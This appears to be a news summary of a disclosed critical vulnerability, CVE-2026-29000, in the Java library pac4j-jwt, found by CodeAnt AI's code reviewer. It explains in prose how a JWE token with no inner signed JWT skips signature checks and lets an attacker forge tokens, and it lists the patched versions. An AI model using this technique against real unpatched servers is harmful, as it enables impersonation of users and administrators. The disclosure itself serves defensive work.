CodeAnt AI Discovers Critical CVSS 10.0 Authentication Bypass in pac4j-jwt Library
Key Takeaways
- ▸CVE-2026-29000 is a CVSS 10.0 critical authentication bypass in pac4j-jwt allowing complete system compromise using only public keys
- ▸The vulnerability was discovered by CodeAnt AI's AI code reviewer during research validating whether CVE patches actually fix reported issues
- ▸Attackers can forge JWT tokens with arbitrary claims by crafting JWE tokens without inner signed JWTs, causing signature verification to be silently skipped
Summary
CodeAnt AI's security research team has disclosed CVE-2026-29000, a critical authentication bypass vulnerability in pac4j-jwt, a widely-used Java authentication library. The flaw, rated CVSS 10.0, allows attackers to forge JWT tokens and impersonate any user—including administrators—using only the server's public RSA key. The vulnerability was discovered through CodeAnt AI's AI-powered code review system during an internal research project analyzing whether CVE patches in open-source packages actually fix reported vulnerabilities.
The vulnerability stems from a logic error in the JwtAuthenticator.java code where signature verification is conditionally skipped based on a null check. In JWT authentication flows using two-layer protection (JWE encryption and JWS signature), the code attempts to extract a signed JWT from the encrypted payload. However, if this extraction returns null—which occurs when an attacker crafts a JWE token containing arbitrary claims without an inner signed JWT—the signature verification block is entirely bypassed. The server then proceeds to authenticate the user based solely on the unverified token claims, completely undermining the authentication mechanism.
Pac4j maintainer Jérôme Leleu has confirmed, patched, and published a security advisory crediting CodeAnt AI's research. Organizations using pac4j-jwt are urged to update immediately to patched versions: 4.5.9+ for the 4.x line, 5.7.9+ for 5.x, and 6.3.3+ for 6.x. The discovery highlights both the effectiveness of AI-assisted security research and the critical importance of proper cryptographic implementation, where encryption and signature verification serve fundamentally different security purposes that cannot be treated as interchangeable.
- All pac4j-jwt users must upgrade immediately to versions 4.5.9+, 5.7.9+, or 6.3.3+ depending on their release line
- The flaw demonstrates the critical difference between encryption (confidentiality) and signatures (authenticity/integrity) in JWT security
Editorial Opinion
This discovery showcases the promising potential of AI-assisted security research in identifying subtle logic vulnerabilities that traditional scanning might miss. The fact that CodeAnt AI's system could flag a nuanced null check anomaly that led to complete authentication bypass demonstrates how AI code review can augment human security expertise. However, the vulnerability itself serves as a sobering reminder that even mature, widely-deployed authentication libraries can harbor critical flaws in cryptographic implementation—underscoring why security cannot be treated as a solved problem even in established codebases.
